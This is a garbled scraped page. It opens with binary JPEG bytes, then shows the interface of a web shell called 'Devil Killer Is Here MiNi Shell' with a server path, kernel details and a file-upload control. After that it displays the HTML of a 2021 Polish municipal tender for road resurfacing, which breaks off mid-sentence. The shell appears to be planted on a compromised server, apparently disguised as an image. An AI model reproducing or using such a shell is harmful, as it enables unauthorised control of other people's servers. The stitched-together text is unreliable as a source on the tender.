JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210816/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210816/0014966101-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa nawierzchni asfaltowej dróg gminnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Rudziniec</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276257802</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Gliwicka 26</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rudziniec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-160</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">324000715</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@rudziniec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rudziniec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa nawierzchni asfaltowej dróg gminnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2ad92880-fc06-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00149661</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000060/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Przebudowa nawierzchni asfaltowej dróg gminnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.biuletyn.net/nt-bin/start.asp?podmiot=rudziniec/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu: 1) miniPortalu – https://miniportal.uzp.gov.pl 2) ePUAPu – https://epuap.gov.pl/wps/portal 3) poczty elektronicznej - gmina@rudziniec.pl.<br/>2. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”. 3. Składanie oświadczeń, wniosków oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP). 4. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany adres e-mail. 5. Za datę przekazania dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z art. 61. ust. 1. oraz art. 63 ust. 2 ustawy PZP komunikacja w niniejszym postępowaniu odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej, pliki należy opatrzyć: - kwalifikowanym podpisem elektronicznym, - podpisem zaufanym, - lub podpisem osobistym. 1) Formaty plików wykorzystywanych przez Wykonawców powinny być zgodne z rozporządzeniem Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (t.j. Dz. U. z 2017 r. poz. 2247). 2) Zamawiający rekomenduje wykorzystanie formatów: .pdf, .doc, .xls, .jpg (.jpeg) ze szczególnym wskazaniem na .pdf. 3) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip lub .7Z. 4) Wśród formatów powszechnych a nie występujących w rozporządzeniu występują: .rar, .gif, .bmp, .numbers, .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie. 5) Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB. 6) Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, Zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES. Pliki w innych formatach niż .pdf zaleca się opatrzyć zewnętrznym podpisem XAdES. Należy pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym. 7) Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacją plików. 8) Podczas podpisywania plików zaleca się stosowanie algorytmu skrótu SHA2 zamiast SHA1. 9) Jeśli wykonawca pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików. 10) Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu. 11) Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym. Może to skutkować naruszeniem integralności plików co równoważne będzie z koniecznością odrzucenia oferty w postępowaniu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r.; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Wójt Gminy Rudziniec, z siedzibą w Urzędzie Gminy w Rudzińcu przy ul. Gliwickiej 26, 44-160 Rudziniec;<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: oc@rudziniec.pl;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym z negocjacjami;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy PZP;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu: a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; c)<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UE.271.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa nawierzchni asfaltowej dróg gminnych część I<br/>1) Przebudowa nawierzchni asfaltowej odcinka ulicy Nowowiejskiej w Słupsku. Przedmiotem zamówienia są roboty budowlane polegające na przebudowie nawierzchni drogi, a w zakres robót wchodzi m.in.:<br/>a) wykonanie robót pomiarowych w ilości 0,082 km;<br/>b) wyrównanie istniejącej nawierzchni asfaltowej mieszanką mineralno-bitumiczną o średniej grubość 3 cm/m2 w ilości 12,30 t;<br/>c) wykonanie korytowania, podbudowy z tłucznia kamiennego o grubości warstwy 20 cm, warstwy wiążącej z mieszanki mineralno-bitumicznej o grubości 5 cm w ilości 18,00 m2 <br/>na wjazdach o nawierzchni gruntowej;<br/>d) wykonanie warstwy ścieralnej z mieszanki mineralno-bitumicznej o grubości 4 cm oraz na wjazdach w ilości 274,00 m2;<br/>e) dostosowanie istniejących wjazdów z kostki betonowej wraz z krawężnikami w ilości 5,00 m2 (5 mb krawężnika);<br/>f) zabudowa krawężników drogowych na wjazdach w ilości 18,00 mb;<br/>g) regulacja studni kanalizacyjnych w ilości 3 sztuk;<br/>h) wykonanie utwardzenia pobocza drogi żużlem wielkopiecowym o grubości warstwy 10 cm na szerokości 0,30 m po każdej stronie jezdni w ilości 29,4 m2, jednak nie szerzej niż szerokość pasa drogowego.<br/>2) Przebudowa nawierzchni asfaltowej - odcinka ulicy Stawowej w Słupsku. Przedmiotem zamówienia są roboty budowlane polegające na przebudowie nawierzchni drogi, a w zakres robót wchodzi m.in.:<br/>a) wykonanie robót pomiarowych w ilości 0,62 km;<br/>b) wykonanie wyrównania podbudowy z kruszywa kamiennego o szerokości 3 m i średniej grubości 5 cm w ilości 4,05 m3 - na końcowym odcinku drogi - 27 mb;<br/>c) wykonanie warstwy wiążącej z mieszkanki mineralno-bitumicznej na całej szerokości jedni 3,0 m i grubości 5 cm i na wjeździe w ilości 86,50 m2;<br/>d) wykonanie warstwy ścieralnej z mieszanki mineralno-bitumicznej na całej szerokości jezdni 3,0 m o grubości 4 cm i na wjazdach w ilości 197,75 m2;<br/>e) regulacja studni kanalizacyjnych w ilości 1 sztuki;<br/>f) wykonanie utwardzenia poboczy z tłucznia kamiennego o szerokości 30 cm i grubości warstwy 10 cm w ilości 31,20 m2, jednak nie szerzej niż szerokość pasa drogowego.<br/>3) Przebudowa nawierzchni asfaltowej ulicy Ogrodowej w Chechle. Przedmiotem zamówienia są roboty budowlane polegające na przebudowie nawierzchni drogi, a w zakres robót wchodzi m.in.:<br/>a) wykonanie robót pomiarowych w ilości 0,440 km;<br/>b) wykonanie korytowania i podbudowy z kruszywa kamiennego o grubości 20 cm na wjazdach w ilości 50 m2;<br/>c) wykonanie warstwy wiążącej z mieszanki mineralno-bitumicznej o grubości 5 cm na wjazdach w ilości 90 m2;<br/>d) wyrównanie istniejącej nawierzchni asfaltowej mieszanką mineralno-bitumiczną o średniej grubość 3 cm/m2 w ilości 99,00 t;<br/>e) wykonanie mechanicznego czyszczenia nawierzchni oraz skropienie nawierzchni drogowej asfaltem oraz na wjazdach w ilości 1718 m2;<br/>f) wykonanie warstwy ścieralnej z mieszanki mineralno-bitumicznej o grubości 4 cm oraz na wjazdach w ilości 1718 m2;<br/>g) dostosowanie wysokości nawierzchni wraz z krawężnikami istniejących wjazdów do bramy i furtki w ilości 9 m2;<br/>h) regulacja pionowa zaworów wodociągowych w ilości 4 sztuk;<br/>i) wykonanie utwardzenia pobocza drogi żużlem wielkopiecowym o grubości warstwy 10 cm na szerokości 0,50 m po każdej stronie jezdni poza wjazdami w ilości 323 m2, jednak nie szerzej niż szerokość pasa drogowego.<br/>4) Przebudowa nawierzchni asfaltowej ulicy Ogrodowej w Łanach. Przedmiotem zamówienia są roboty budowlane polegające na przebudowie nawierzchni drogi, a w zakres robót wchodzi m.in.:<br/>a) wykonanie robót pomiarowych w ilości 0,210 km;<br/>b) wyrównanie istniejącej nawierzchni asfaltowej mieszanką mineralno-bitumiczną o średniej grubość 3 cm/m2 w ilości 50,4 t;<br/>c) wykonanie korytowania, podbudowy z tłucznia kamiennego o grubości warstwy 20 cm, warstwy wiążącej z mieszanki mineralno-bitumicznej o grubości 5 cm w ilości 20,00 m2 na wjazdach o nawierzchni gruntowej;<br/>d) wykonanie warstwy ścieralnej z mieszanki mineralno-bitumicznej o grubości 4 cm oraz na wjazdach w ilości 692,00 m2;<br/>e) dostosowanie istniejących wjazdów z kostki betonowej wraz z krawężnikami w ilości 55,00 m2 oraz regulacja 55 mb krawężnika drogowego;<br/>f) wykonanie utwardzenia pobocza drogi żużlem wielkopiecowym o grubości warstwy 10 cm na szerokości 0,50 m po każdej stronie jezdni w ilości 135 m2, jednak nie szerzej niż szerokość pasa drogowego.<br/>5) Przebudowa nawierzchni asfaltowej - bocznej ulicy Toszeckiej w Niekarmii. Przedmiotem zamówienia są roboty budowlane polegające na przebudowie nawierzchni drogi, a w zakres robót wchodzi m.in.:<br/>a) wykonanie robót pomiarowych w ilości 0,117 km;<br/>b) wykonanie wyrównania podbudowy z kruszywa kamiennego o szerokości 3 m i średniej grubości 5 cm w ilości 7,65 m3 - na końcowym odcinku drogi - 51 mb;<br/>c) wykonanie warstwy wiążącej na całym odcinku drogi oraz na wjazdach z mieszanki mineralno-bitumicznej o grubości 5 cm w ilości 358,5 m2;<br/>d) wykonanie warstwy ścieralnej z mieszanki mineralno-bitumicznej o grubości 4 cm oraz na wjazdach w ilości 358,5 m2;<br/>e) wykonanie utwardzenia pobocza drogi żużlem wielkopiecowym o grubości warstwy 10 cm na szerokości 0,30 m po każdej stronie jezdni w ilości 67,8 m2, jednak nie szerzej niż szerokość pasa drogowego.<br/>6) Przebudowa nawierzchni asfaltowej ulicy Łąkowej w Widowie. Przedmiotem zamówienia są roboty budowlane polegające na przebudowie nawierzchni drogi, a w zakres robót wchodzi m.in.:<br/>a) wykonanie robót pomiarowych w ilości 0,050 km;<br/>b) wykonanie wyrównania istniejącej nawierzchni mieszanką mineralno-bitumiczną o szerokości 3 m i średniej grubości 3 cm/m2 w ilości 11,25 t;<br/>c) wykonanie warstwy ścieralnej z mieszanki mineralno-bitumicznej o grubości 4 cm oraz na wjeździe w ilości 154 m2;<br/>d) wykonanie utwardzenia pobocza drogi żużlem wielkopiecowym o grubości warstwy 10 cm na szerokości 0,30 m po każdej stronie jezdni w ilości 30 m2, jednak nie szerzej niż szerokość pasa drogowego.<br/>7) Przebudowa nawierzchni asfaltowej odcinka ulicy Polnej w Widowie. Przedmiotem zamówienia są roboty budowlane polegające na przebudowie nawierzchni drogi, a w zakres robót wchodzi m.in.:<br/>a) wykonanie robót pomiarowych w ilości 0,050 km;<br/>b) wykonanie wyrównania podbudowy z kruszywa kamiennego o szerokości 3 m i średniej grubości 10 cm w ilości 15 m3;<br/>c) wykonanie warstwy wiążącej na całym odcinku drogi oraz na wjeździe z mieszanki mineralno-bitumicznej o grubości 5 cm w ilości 154 m2;<br/>d) wykonanie warstwy ścieralnej z mieszanki mineralno-bitumicznej o grubości 4 cm oraz na wjeździe w ilości 154 m2;<br/>e) wykonanie utwardzenia pobocza drogi żużlem wielkopiecowym o grubości warstwy 10 cm na szerokości 0,30 m po każdej stronie jezdni w ilości 77,4 m2, jednak nie szerzej niż szerokość pasa drogowego.<br/>Podstawowe parametry techniczne drogi przedstawiają się następująco:<br/>- klasa techniczna ulicy – D;<br/>- prędkość projektowa – Vp= 50km/h;<br/>- kategoria obciążenia ruchem – KR1;<br/>- szerokość jezdni 3,0 m;<br/>- pochylenie poprzeczne nawierzchni – 2%;<br/>- nawierzchnia drogi – bitumiczna;<br/>- szerokość poboczy – 0,30m – 0,50m;<br/>- pochylenie poprzeczne poboczy – 8%.<br/>Szczegółowy opis przedmiotu zamówienia zawarty jest w rozdziale 3 SWZ oraz w załączniku nr 1 do SWZ - Dokumentacja techniczna. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">63 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa nawierzchni asfaltowej dróg gminnych część II<br/>1) Przebudowa nawierzchni asfaltowej odcinka ulicy Brzozowej w Bojszowie. Przedmiotem zamówienia są roboty budowlane polegające na przebudowie 